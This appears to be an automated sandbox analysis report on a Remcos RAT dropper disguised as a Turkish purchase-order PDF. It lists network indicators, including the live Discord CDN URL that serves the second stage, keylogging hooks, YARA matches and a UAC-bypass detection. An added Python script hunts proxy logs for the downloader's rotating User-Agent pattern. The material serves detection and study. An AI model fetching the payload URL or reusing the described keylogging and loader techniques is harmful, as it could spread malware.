Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000003.269381013.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000003.278138835.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000003.269349489.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310588608.00000000007BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000003.278138835.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310588608.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310005988.0000000000775000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310005988.0000000000775000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/.
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000003.278138835.00000000007C1000.00000004.00000020.00020000.00000000.sdmp, Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.310588608.00000000007BC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/2y
Source: Eluiezilfw.exe, 00000008.00000002.347399894.0000000003760000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwm
Source: unknown DNS traffic detected: queries for: cdn.discordapp.com
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_00402149 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,malloc,recv,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,free,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 3_2_00402149
Source: global traffic HTTP traffic detected: GET /attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm HTTP/1.1
  User-Agent: lVali
  Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm HTTP/1.1
  User-Agent: 21
  Host: cdn.discordapp.com
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm HTTP/1.1
  User-Agent: 16
  Host: cdn.discordapp.com
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm HTTP/1.1
  User-Agent: 91
  Host: cdn.discordapp.com
  Cache-Control: no-cache
Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.3:49716 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.3:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.3:49751 version: TLS 1.2
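The four GET requests above pull the same Discord CDN attachment (an extension-less object whose name matches the dropped Eluiezilfw.exe) with a different User-Agent on every attempt: "lVali", then the bare numbers "21", "16" and "91". That is a downloader retrying, not a browser, and it is the cheapest thing to hunt for in proxy logs. The TCP session to 37.0.14.195:5017 is a separate non-HTTP channel, presumably the Remcos C2 the signature list refers to. The script below is an added example and not part of the sandbox report: it runs that hunt over constructed proxy-log lines (the log format is invented here; it carries the four observed requests plus two benign ones) and flags Discord attachment fetches by non-browser or numeric User-Agents, attachments without a file extension, and one client cycling through several User-Agents for the same URL.

```python
"""Hunt HTTP/proxy logs for the second-stage fetch pattern recorded above: one
host pulling the same cdn.discordapp.com attachment repeatedly, each time with a
different non-browser User-Agent ('lVali', '21', '16', '91'), for a file with no
extension. Added example, not part of the sandbox report. The log format is a
constructed one: '<timestamp> <src-ip> <method> <host> <path> "<user-agent>"'."""
import re
from collections import defaultdict

# Constructed sample log: the four requests seen in this report plus two benign
# lines (a browser fetching an image, the OS fetching a CRL).
SAMPLE_LOG = """\
2022-06-26T09:41:10Z 192.168.2.3 GET cdn.discordapp.com /attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm "lVali"
2022-06-26T09:41:12Z 192.168.2.3 GET cdn.discordapp.com /attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm "21"
2022-06-26T09:41:15Z 192.168.2.3 GET cdn.discordapp.com /attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm "16"
2022-06-26T09:41:19Z 192.168.2.3 GET cdn.discordapp.com /attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm "91"
2022-06-26T09:42:00Z 192.168.2.7 GET cdn.discordapp.com /attachments/111111111111111111/222222222222222222/holiday.png "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/102.0 Safari/537.36"
2022-06-26T09:42:30Z 192.168.2.3 GET crl.globalsign.net /root-r2.crl "Microsoft-CryptoAPI/10.0"
"""

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\S+) "([^"]*)"$')
# Discord attachment URLs: /attachments/<id>/<id>/<filename>
ATTACHMENT_RE = re.compile(r"^/attachments/(\d{17,20})/(\d{17,20})/([^/?]+)$")
BROWSER_UA_PREFIXES = ("Mozilla/",)  # extend with legitimate non-browser clients in your estate


def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, src, method, host, path, ua = m.groups()
    return {"ts": ts, "src": src, "method": method, "host": host, "path": path, "ua": ua}


def user_agent_reasons(ua):
    """Why a User-Agent does not look like a browser (empty list = looks fine)."""
    reasons = []
    if not ua.startswith(BROWSER_UA_PREFIXES):
        reasons.append("non-browser user-agent")
    if ua.isdigit():
        reasons.append("numeric user-agent")
    elif len(ua) < 8:
        reasons.append("very short user-agent")
    return reasons


def classify(event):
    """Reasons to flag one request; only Discord CDN attachment fetches are scored."""
    if event["host"] != "cdn.discordapp.com":
        return []
    m = ATTACHMENT_RE.match(event["path"])
    if not m:
        return []
    reasons = user_agent_reasons(event["ua"])
    if "." not in m.group(3):
        reasons.append("attachment without file extension")
    return reasons


def hunt(log_text):
    """Return (flagged events, {(src, path): sorted UAs} for rotating-UA clients)."""
    findings = []
    for line in log_text.splitlines():
        event = parse_line(line)
        if event is None:
            continue
        reasons = classify(event)
        if reasons:
            findings.append({**event, "reasons": reasons})
    # One client fetching one attachment under three or more different UAs is a
    # downloader retrying with per-attempt junk UAs, not a person in a browser.
    uas_per_url = defaultdict(set)
    for f in findings:
        uas_per_url[(f["src"], f["path"])].add(f["ua"])
    rotating = {k: sorted(v) for k, v in uas_per_url.items() if len(v) >= 3}
    return findings, rotating


if __name__ == "__main__":
    flagged, rotating = hunt(SAMPLE_LOG)
    for f in flagged:
        print(f["ts"], f["src"], f["ua"], "->", "; ".join(f["reasons"]))
    for (src, path), uas in rotating.items():
        print(f"rotating user-agents from {src} for {path}: {uas}")
```

The User-Agent check alone is noisy (plenty of legitimate tooling fetches from the CDN without a Mozilla/ string), so the rotating-UA aggregate is the one to alert on: it needs the same client, the same attachment and three or more distinct User-Agents, which a human in a browser never produces. Keep the attachment-without-extension reason as a secondary score, since attackers can trivially append ".png".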

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\SysWOW64\logagent.exe Code function: [Esc] 3_2_00405EB2
Source: C:\Windows\SysWOW64\logagent.exe Code function: [Enter] 3_2_00405EB2
Source: C:\Windows\SysWOW64\logagent.exe Code function: [Tab] 3_2_00405EB2
Source: C:\Windows\SysWOW64\logagent.exe Code function: [Down] 3_2_00405EB2
Source: C:\Windows\SysWOW64\logagent.exe Code function: [Right] 3_2_00405EB2
Source: C:\Windows\SysWOW64\logagent.exe Code function: [Up] 3_2_00405EB2
Source: C:\Windows\SysWOW64\logagent.exe Code function: [Left] 3_2_00405EB2
Source: C:\Windows\SysWOW64\logagent.exe Code function: [End] 3_2_00405EB2
Source: C:\Windows\SysWOW64\logagent.exe Code function: [F2] 3_2_00405EB2
Source: C:\Windows\SysWOW64\logagent.exe Code function: [F1] 3_2_00405EB2
Source: C:\Windows\SysWOW64\logagent.exe Code function: [Del] 3_2_00405EB2
Source: C:\Windows\SysWOW64\logagent.exe Code function: [Del] 3_2_00405EB2
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10546C64 SetWindowsHookExA 0000000D,004052BA,00000000,00000000 3_2_10546C64
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait 3_2_0040D2A6
Source: Yeni sipari#U015fi onaylay#U0131n - TK176H,pdf.exe, 00000000.00000002.308934385.000000000073A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040532D GetKeyState,GetKeyState,GetKeyState,CallNextHookEx, 3_2_0040532D
Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait 3_2_0040D2A6

E-Banking Fraud

Source: Yara match File source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.359362662.0000000004C00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.344931678.0000000000D80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.345028532.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.533899763.00000000031F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.344444843.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.359014931.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: logagent.exe PID: 6552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: DpiScaling.exe PID: 5936, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\SysWOW64\logagent.exe Code function: 3_2_10554D8D SystemParametersInfoW, 3_2_10554D8D

System Summary

Source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 3.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 15.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 14.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 3.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 14.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 15.2.DpiScaling.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 3.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 3.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 14.2.logagent.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 15.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 3.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 15.2.DpiScaling.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 14.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 3.2.logagent.exe.10540000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 15.2.DpiScaling.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 15.2.DpiScaling.exe.1054198f.2.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 14.2.logagent.exe.10540000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: Remcos Payload Author: kevoreilly
Source: 14.2.logagent.exe.1054198f.2.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
Source: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0000000F.00000002.359461010.0000000010540000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Remcos Payload Author: kevoreilly
